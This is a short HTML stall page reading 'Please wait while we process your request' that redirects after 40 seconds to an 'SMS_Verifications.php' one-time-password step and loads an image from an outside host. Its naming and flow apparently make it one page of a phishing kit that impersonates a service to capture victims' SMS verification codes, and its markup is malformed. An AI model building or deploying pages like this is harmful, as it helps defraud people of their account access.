<link rel="shortcut icon" href="templates/favicon.png">
<meta http-equiv="refresh" content="40; URL=SMS_Verifications.php?cmd=_SMS_OTP_Auth_">
</head>
<title>Please wait - Process your request</title>
<link rel="shortcut icon" type="image/x-icon" href="../data/icon/favicon.ico">
<body>

<center><img src="http://atlasflux.saynete.net/image/waitbille.gif">

</div>
<form>
	<div style="font-weight: bolder; font-size:12px;"><h2>* Please wait while we process your request</h2><h2>* Do not close this window</h2>


<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
</body></object></html>